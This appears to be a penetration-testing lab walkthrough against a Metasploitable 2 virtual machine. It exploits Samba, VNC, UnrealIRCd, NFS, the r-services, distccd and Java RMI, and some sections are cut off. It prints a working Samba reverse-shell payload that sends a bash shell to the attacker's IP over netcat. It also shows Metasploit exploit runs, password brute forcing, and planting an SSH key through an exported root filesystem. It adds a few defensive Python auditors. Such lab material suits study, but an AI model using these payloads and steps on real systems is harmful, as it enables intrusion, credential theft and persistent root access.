[*] Command shell session 1 opened (192.168.204.135:4444 -> 192.168.204.136:57884) at 2024-03-17 09:01:33 -0400
bin
boot
cdrom
Manual SMB (Samba Exploitation) on Metasploitable 2 without metasploit
Use smbclient to list the shares. We can connect anonymously.
┌──(kali㉿kali)-[~]
└─$ smbclient -L \\192.168.204.136
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Here we have the tmp share. Whether it is writable does not matter for this exploit; what matters is the server's username map script setting. Samba 3.0.20 through 3.0.25rc3 pass the client-supplied username to that script through a shell, so shell metacharacters in the username are executed on the server.
Connect to the share and check the available commands with the help command.
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.204.136/tmp
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
Now open a listener on the attacking machine.
nc -lnvp 4444
Then, from the smbclient prompt, send the payload as the username with the logon command. The backticks are evaluated by the shell on the target, which runs nc back to our listener:
logon "/=`nc 192.168.204.135 4444 -e /bin/bash`"
And the listener receives a shell.
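To see why the logon trick works, here is the flawed invocation pattern beside its fix, as an added example in Python; it is not Samba's code and not the page's. In smbd's map_username() the username is wrapped in double quotes and the resulting string is run through /bin/sh, so backticks inside the quotes are still expanded. /bin/echo stands in for the administrator's map script (a hypothetical stand-in: it just prints what it receives), and the payload follows the shape used above with a harmless echo in place of the netcat command.

```python
import subprocess

# Hypothetical stand-in for the administrator's "username map script". A real
# one would print the Unix account a login should be mapped to; /bin/echo just
# reflects its argument so we can see exactly what the script received.
MAP_SCRIPT = "/bin/echo"


def map_username_vulnerable(username: str) -> str:
    """Flawed pattern: interpolate the username into a command string and run it
    through the shell. Double quotes do not stop `...` or $(...) expansion."""
    command = f'{MAP_SCRIPT} "{username}"'
    done = subprocess.run(command, shell=True, capture_output=True, text=True)
    return done.stdout.strip()


def map_username_fixed(username: str) -> str:
    """Fixed pattern: no shell at all. The username is a single argv element and
    reaches the script byte for byte, metacharacters included."""
    done = subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True)
    return done.stdout.strip()


# Constructed payload in the shape the walkthrough uses; the netcat reverse
# shell would sit where `echo INJECTED` is. The backticks are the injection.
PAYLOAD = "/=`echo INJECTED`"

if __name__ == "__main__":
    print("vulnerable:", map_username_vulnerable(PAYLOAD))   # /=INJECTED
    print("fixed:     ", map_username_fixed(PAYLOAD))        # /=`echo INJECTED`
```

The same check applies when reviewing any code that builds a command line from a remote username: if the string ever reaches a shell, quoting is not a defence.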
SMB writable share - Wide links
Samba, when configured with a writeable file share and wide links enabled (the default in this version), can also be used as a backdoor of sorts to reach files that were never meant to be shared. The example below uses a Metasploit module to gain access to the root filesystem through an anonymous connection and the writeable tmp share.
┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.204.136
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.204.136:445 Name: 192.168.204.136 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian))
Now we can use a Metasploit module to exploit it. The module creates a symlink named rootfs inside the writeable share that points at /, which Samba follows because wide links is enabled.
┌──(kali㉿kali)-[~]
└─$ msfconsole
msf6 > use auxiliary/admin/smb/samba_symlink_traversal
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf6 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.204.136
[*] 192.168.204.136:445 - Connecting to the server...
[*] 192.168.204.136:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.204.136:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.204.136:445 - Now access the following share to browse the root filesystem:
[*] 192.168.204.136:445 - \\192.168.204.136\tmp\rootfs\
[*] Auxiliary module execution completed
msf6 auxiliary(admin/smb/samba_symlink_traversal) >
Now there is a rootfs directory inside the tmp share through which we can browse the entire filesystem.
┌──(kali㉿kali)-[~]
└─$ smbclient \\\\192.168.204.136\\tmp
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd rootfs
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwd
Port 1524 Remote Shell Metasploitable2
We saw port 1524 open on the machine. Let us fingerprint the running service with a version scan.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vuln -p 1524 192.168.204.136
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-21 23:32 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
1524/tcp open bindshell Metasploitable root shell
MAC Address: 00:0C:29:71:62:0D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.90 seconds
Nmap identifies it as a bind shell. We can connect to it directly with netcat.
┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.204.136 1524
(UNKNOWN) [192.168.204.136] 1524 (ingreslock) open
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# whoami
root
root@metasploitable:/#
We land straight in a root shell: the port requires no authentication at all.
Port 5900 VNC Exploitation Metasploitable2
First scan the service:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -p 5900 --script vuln 192.168.204.136
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-18 10:06 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
5900/tcp open vnc VNC (protocol 3.3)
MAC Address: 00:0C:29:71:62:0D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.61 seconds
The port is open, but the vuln scripts report nothing. We will try brute forcing the password with Metasploit.
Bruteforcing VNC Metasploit
Search for VNC auxiliary modules:
msf6 > search vnc
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/vnc/ard_root_pw normal No Apple Remote Desktop Root Vulnerability
1 auxiliary/server/capture/vnc normal No Authentication Capture: VNC
47 exploit/windows/vnc/ultravnc_viewer_bof 2008-02-06 normal No UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
48 auxiliary/scanner/vnc/vnc_none_auth normal No VNC Authentication None Detection
49 auxiliary/scanner/vnc/vnc_login normal No VNC Authentication Scanner
We have the vnc_login module. Select it and show its options.
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > show options
Module options (auxiliary/scanner/vnc/vnc_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accep
ted: none, user, user&realm)
PASSWORD no The password to test
PASS_FILE /usr/share/metasploit-framework/dat no File containing passwords, one per line
a/wordlists/vnc_passwords.txt
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-fr
amework/wiki/Using-Metasploit
RPORT 5900 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per
USERNAME <BLANK> no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated
r per line
USER_AS_PASS false no Try the username as the password for all user
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
Set the target and run the module with the default Metasploit VNC wordlist. VNC Authentication (security type 2) is password-only, so the USERNAME option set below has no effect on the result.
msf6 auxiliary(scanner/vnc/vnc_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(scanner/vnc/vnc_login) > run
[*] 192.168.204.136:5900 - 192.168.204.136:5900 - Starting VNC login sweep
[!] 192.168.204.136:5900 - No active DB -- Credential data will not be saved!
[+] 192.168.204.136:5900 - 192.168.204.136:5900 - Login Successful: :password
[*] 192.168.204.136:5900 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/vnc/vnc_login) >
The module finds the password: password. The empty field before the colon is the username, which VNC Authentication does not use.
Now we can connect to the target with vncviewer, entering password when prompted.
┌──(kali㉿kali)-[~]
└─$ vncviewer 192.168.204.136
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
Port 6667 ircd Exploitation Metasploitable2
Scanning port 6667
First scan the port with the vuln scripts to see if we get some useful information:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vuln -p 6667 192.168.204.136
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-19 10:19 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
6667/tcp open irc UnrealIRCd
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
MAC Address: 00:0C:29:71:62:0D (VMware)
Service Info: Host: irc.Metasploitable.LAN
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.89 seconds
The script reports that the service looks like a trojaned (backdoored) build of UnrealIRCd.
Vulnerability Assessment
Let us see if searchsploit finds something.
┌──(kali㉿kali)-[~]
└─$ searchsploit unreal
--------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------- ---------------------------------
Epic Games Unreal Engine 436 - Client Unreal URL Denial of Service | multiple/dos/22223.txt
Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities | multiple/remote/32363.txt
Epic Games Unreal Engine 436 - URL Directory Traversal | multiple/remote/22224.txt
Epic Games Unreal Engine Logging Function - Remote Denial of Service | multiple/dos/30513.txt
Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File Overwrite | multiple/remote/24041.c
Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier | multiple/dos/21593.txt
Epic Games Unreal Tournament Server 436.0 - Engine Remote Format String | multiple/dos/23799.txt
Unreal Commander 0.92 - Directory Traversal | windows/remote/30569.py
Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite | multiple/remote/30521.txt
Unreal Engine - 'ReceivedRawBunch()' Denial of Service | multiple/dos/34340.txt
Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service | multiple/dos/32386.txt
Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow (PoC) | multiple/dos/34261.txt
Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service | multiple/dos/32362.txt
Unreal Tournament - Remote Buffer Overflow (SEH) | windows/remote/16145.pl
Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit) | linux/remote/16848.rb
Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit) | windows/remote/16693.rb
Unreal Tournament 2004 - 'Secure' Remote Overflow (Metasploit) | linux/remote/10032.rb
Unreal Tournament 2004 - Null Pointer Remote Denial of Service | multiple/dos/32125.txt
Unreal Tournament 3 - Memory Corruption (Denial of Service) | multiple/dos/32127.txt
Unreal Tournament 3 1.3 - Directory Traversal | windows/remote/6506.txt
Unreal Tournament 3 2.1 - 'STEAMBLOB' Remote Denial of Service | windows/dos/14414.txt
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
-------------------------------------------
We do have an entry for UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit).
Unreal IRCD Exploitation with Metasploit
Let us fire up Metasploit and exploit it.
msf6 > search unreal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux)
1 exploit/windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32)
2 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
Interact with a module by name or index. For example info 2, use 2 or use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
Set the payload to cmd/unix/bind_ruby.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
1 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
3 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
5 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
6 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
7 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
8 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
9 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
10 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
11 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
Now run it, and we get a shell.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] 192.168.204.136:6667 - Connected to 192.168.204.136:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.204.136:6667 - Sending backdoor command...
[*] Started bind TCP handler against 192.168.204.136:4444
[*] Command shell session 1 opened (192.168.204.135:38267 -> 192.168.204.136:4444) at 2024-03-19 10:26:45 -0400
ls
Donation
LICENSE
aliases
badwords.channel.conf
badwords.message.conf
Port 2049 NFS Exploitation - Metasploitable 2
First quickly scan the target.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 2049 192.168.204.136
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 02:30 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00036s latency).
PORT STATE SERVICE
2049/tcp open nfs
MAC Address: 00:0C:29:71:62:0D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
The port is open. Now we can list which NFS shares are exported and available to mount.
┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.204.136
Export list for 192.168.204.136:
/ *
The command showmount -e 192.168.204.136 displays the list of directories shared by the NFS (Network File System) server at 192.168.204.136.
The output shows that one shared directory is available on that server. Here is the breakdown of the output:
Export list for 192.168.204.136: - this line introduces the list of directories exported (shared) by the NFS server at the given IP address.
/ * - this line gives the shared directory and its export options. Here / is the root directory of the file system, and * means it is exported to all hosts: any host on the network that can reach the NFS server can mount this directory and access its contents.
In summary, the NFS server at 192.168.204.136 is sharing its root directory (/) with all hosts on the network.
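As an added defensive check, not part of the original walkthrough, the following Python parses showmount -e output and flags any export whose client list is *, the situation seen above. The sample output is constructed: its first line mirrors the / * export from Metasploitable 2, the other two are made-up, properly scoped exports.

```python
"""Flag world-accessible NFS exports from `showmount -e` output.

Added example, not from the original walkthrough. It parses the text that
showmount -e prints and reports exports whose client list is "*" (exported to
every host). The sample input below is constructed: its first export mirrors
the "/ *" line seen against Metasploitable 2, the other two are made up.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample output (not captured from a real host).
SAMPLE_SHOWMOUNT = """\
Export list for 192.168.204.136:
/          *
/srv/data  10.0.0.0/24,build01.example.lan
/home      *.example.lan
"""

# Client-list tokens that mean "anyone" on common showmount implementations.
WORLD_TOKENS = {"*", "(everyone)"}


@dataclass
class Export:
    path: str
    clients: List[str] = field(default_factory=list)

    def is_world_exported(self) -> bool:
        """True when any client entry grants access to every host."""
        return any(c in WORLD_TOKENS for c in self.clients)


def parse_showmount(output: str) -> List[Export]:
    """Parse `showmount -e` text into Export records.

    Each data line is "<path> <client>[,<client>...]"; the header line
    ("Export list for ...") and blank lines are skipped.
    """
    exports = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Export list for"):
            continue
        parts = re.split(r"\s+", line, maxsplit=1)
        path = parts[0]
        clients = parts[1].split(",") if len(parts) > 1 else []
        exports.append(Export(path, [c.strip() for c in clients if c.strip()]))
    return exports


def assess(export: Export) -> Optional[str]:
    """Return a one-line finding for a risky export, or None if it is scoped.

    The root filesystem exported to everyone is the worst case: a client that
    is root locally can read and write the whole tree, which is what lets the
    walkthrough above place a key under /root/.ssh over the mount.
    """
    if not export.is_world_exported():
        return None
    if export.path == "/":
        return f"CRITICAL: root filesystem {export.path} exported to all hosts"
    return f"HIGH: {export.path} exported to all hosts"


def audit_showmount(output: str) -> List[str]:
    """Run assess() over every export and return the non-empty findings."""
    return [f for f in map(assess, parse_showmount(output)) if f]


if __name__ == "__main__":
    for finding in audit_showmount(SAMPLE_SHOWMOUNT):
        print(finding)
```

A scoped export such as /home *.example.lan is not flagged, because only a bare * (or "(everyone)") opens the share to every host.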
Now, we can mount it.
┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/nfs
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.204.136:/ /mnt/nfs
Created symlink /run/systemd/system/remote-fs.target.wants/rpc-statd.service → /usr/lib/systemd/system/rpc-statd.service.
┌──(kali㉿kali)-[~]
└─$ df -k
Filesystem 1K-blocks Used Available Use% Mounted on
udev 1963284 0 1963284 0% /dev
tmpfs 401016 1268 399748 1% /run
/dev/sda1 82083148 14386412 63481188 19% /
tmpfs 2005072 0 2005072 0% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 401012 128 400884 1% /run/user/1000
192.168.204.136:/ 7282176 1486656 5428544 22% /mnt/nfs
┌──(kali㉿kali)-[~]
└─$ cd /mnt/nfs
┌──(kali㉿kali)-[/mnt/nfs]
└─$ ls
bin cdrom etc initrd lib media nohup.out proc sbin sys usr vmlinuz
boot dev home initrd.img lost+found mnt opt root srv tmp var
Now we can generate an SSH key pair.
┌──(root㉿kali)-[/home/kali]
└─# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:fPlTqIgu9KBlLupk7ZEBlm9RZSNxmDvjuF7EBi4MqQw root@kali
The key's randomart image is:
+---[RSA 3072]----+
| +== |
| .. .o+ . |
|E+ o . |
|B + ++ . . . |
|.+ =o+o S o . . |
| +.X. . o o . |
| o X.+. . . o |
|o +.=.. . |
|oo.+ .. |
+----[SHA256]-----+
Now copy the public key into the target's .ssh directory through the mounted share.
┌──(root㉿kali)-[~/.ssh]
└─# ls
id_rsa id_rsa.pub
┌──(root㉿kali)-[~/.ssh]
└─# cp id_rsa.pub /mnt/nfs/root/.ssh/
Now, append it to the authorized_keys file.
┌──(root㉿kali)-[/mnt/nfs/root/.ssh]
└─# cat id_rsa.pub >> authorized_keys
We can now connect to our machine with SSH. (Having errors)
Ports 512, 513, 514 remote services exploitation - Metasploitable 2
TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote access from any host (a standard ".rhosts + +" situation).
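As an added defensive check, not part of the original walkthrough, the following Python audits the trust files the r-services consult (/etc/hosts.equiv and each user's .rhosts) for the "+ +" wildcard described above. The file contents are constructed strings so the audit runs offline.

```python
"""Audit r-service trust files for wildcard entries such as "+ +".

Added example, not from the original walkthrough. rlogin/rsh/rexec consult
/etc/hosts.equiv and ~/.rhosts; each entry is "<host> [<user>]", and a "+" in
either field is a wildcard. "+ +" therefore trusts every user on every host,
which is the Metasploitable 2 misconfiguration described above. The file
contents below are constructed samples so the audit runs offline.
"""
from typing import Dict, List, Optional, Tuple

# Constructed sample files (not copied from any real host).
SAMPLE_FILES: Dict[str, str] = {
    "/etc/hosts.equiv": "# trusted build hosts\nbuild01.example.lan\n+ +\n",
    "/root/.rhosts": "+ +\n-evil.example.lan\n",
    "/home/alice/.rhosts": "build01.example.lan alice\nbuild02.example.lan +\n",
}


def classify_entry(line: str) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for a risky entry, or None if it is benign.

    Comments and deny entries (host prefixed with "-") are ignored.
    """
    entry = line.split("#", 1)[0].strip()
    if not entry:
        return None
    fields = entry.split()
    host = fields[0]
    user = fields[1] if len(fields) > 1 else None
    if host.startswith("-"):
        return None                      # explicit deny, never a grant
    if host == "+" and user == "+":
        return ("critical", "any user on any host, no password required")
    if host == "+":
        return ("high", "any host may log in as the matching local user")
    if user == "+":
        return ("high", f"any user on {host} may log in")
    return None


def audit_trust_file(path: str, text: str) -> List[dict]:
    """Classify every entry in one trust file; returns only the risky ones."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        verdict = classify_entry(raw)
        if verdict is not None:
            findings.append({"file": path, "line": lineno, "entry": raw.strip(),
                             "severity": verdict[0], "reason": verdict[1]})
    return findings


def audit_all(files: Dict[str, str]) -> List[dict]:
    """Audit a mapping of path -> contents, worst findings first."""
    order = {"critical": 0, "high": 1}
    findings = [f for path, text in files.items()
                for f in audit_trust_file(path, text)]
    return sorted(findings,
                  key=lambda f: (order[f["severity"]], f["file"], f["line"]))


if __name__ == "__main__":
    for f in audit_all(SAMPLE_FILES):
        print(f"{f['severity'].upper():8} {f['file']}:{f['line']} "
              f"'{f['entry']}' - {f['reason']}")
```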
Let's scan to see whether these ports are open.
┌──(kali㉿kali)-[/]
└─$ sudo nmap -p 512,513,514 192.168.204.136
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:26 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00052s latency).
PORT STATE SERVICE
512/tcp open exec
513/tcp open login
514/tcp open shell
MAC Address: 00:0C:29:71:62:0D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
Now we can connect to it.
┌──(kali㉿kali)-[/]
└─$ rlogin -l root 192.168.204.136
Last login: Sat Apr 27 02:22:48 EDT 2024 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
Port 3632 distccd exploitation - Metasploitable 2
distccd makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that, when it is exposed with a weak configuration, an attacker can abuse it to run a command of their choice.
Let us scan it.
┌──(kali㉿kali)-[/]
└─$ sudo nmap -p 3632 --script=vuln 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:47 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00058s latency).
PORT STATE SERVICE
3632/tcp open distccd
| distcc-cve2004-2687:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://nvd.nist.gov/vuln/detail/CVE-2004-2687
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|_ https://distcc.github.io/security.html
MAC Address: 00:0C:29:71:62:0D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds
We can now use Metasploit to exploit it.
msfconsole
msf6 > use exploit/unix/misc/distcc_exec
[*] No payload configured, defaulting to cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
msf6 exploit(unix/misc/distcc_exec) > run
[*] Started bind TCP handler against 192.168.204.136:4444
[*] Command shell session 1 opened (192.168.204.137:44185 -> 192.168.204.136:4444) at 2024-04-27 04:54:44 -0400
id
uid=1(daemon) gid=1(daemon)
Port 1099 - Java-rmi exploitation - Metasploitable 2
Let us first scan the target.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 1099 -sC -sV --script=vuln 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 01:11 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00088s latency).
PORT STATE SERVICE VERSION
1099/tcp open java-rmi GNU Classpath grmiregistry
| rmi-vuln-classloader:
| VULNERABLE:
| RMI registry default configuration remote code execution vulnerability
| State: VULNERABLE
| Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
|
| References:
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
MAC Address: 00:0C:29:71:62:0D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds
Now we can use the Metasploit Java RMI module to exploit it.
┌──(kali㉿kali)-[~]
└─$ msfconsole
msf6 > search java rmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce 2019-05-22 excellent Yes Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
1 exploit/multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution
2 auxiliary/scanner/misc/java_jmx_server 2013-05-22 normal No Java JMX Server Insecure Endpoint Code Execution Scanner
3 auxiliary/gather/java_rmi_registry normal No Java RMI Registry Interfaces Enumeration
4 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
5 auxiliary/scanner/misc/java_rmi_server 2011-10-15 normal No Java RMI Server Insecure Endpoint Code Execution Scanner
6 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation
7 exploit/multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution
8 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE
9 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability
10 exploit/linux/http/kibana_timelion_prototype_pollution_rce 2019-10-30 manual Yes Kibana Timelion Prototype Pollution RCE
11 exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
